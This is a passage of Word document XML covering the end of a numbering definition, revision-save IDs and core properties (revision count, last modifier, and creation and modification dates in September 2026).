    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="53281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E5E"/>
    <w:rsid w:val="000A295D"/>
    <w:rsid w:val="001B0176"/>
    <w:rsid w:val="006B4B08"/>
    <w:rsid w:val="00724E5E"/>
    <w:rsid w:val="00F21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94D2"/>
  <w15:docId w15:val="{20D73C67-4874-4452-8C6F-A7A3E4FD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Lawrence</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-12T10:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-12T11:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>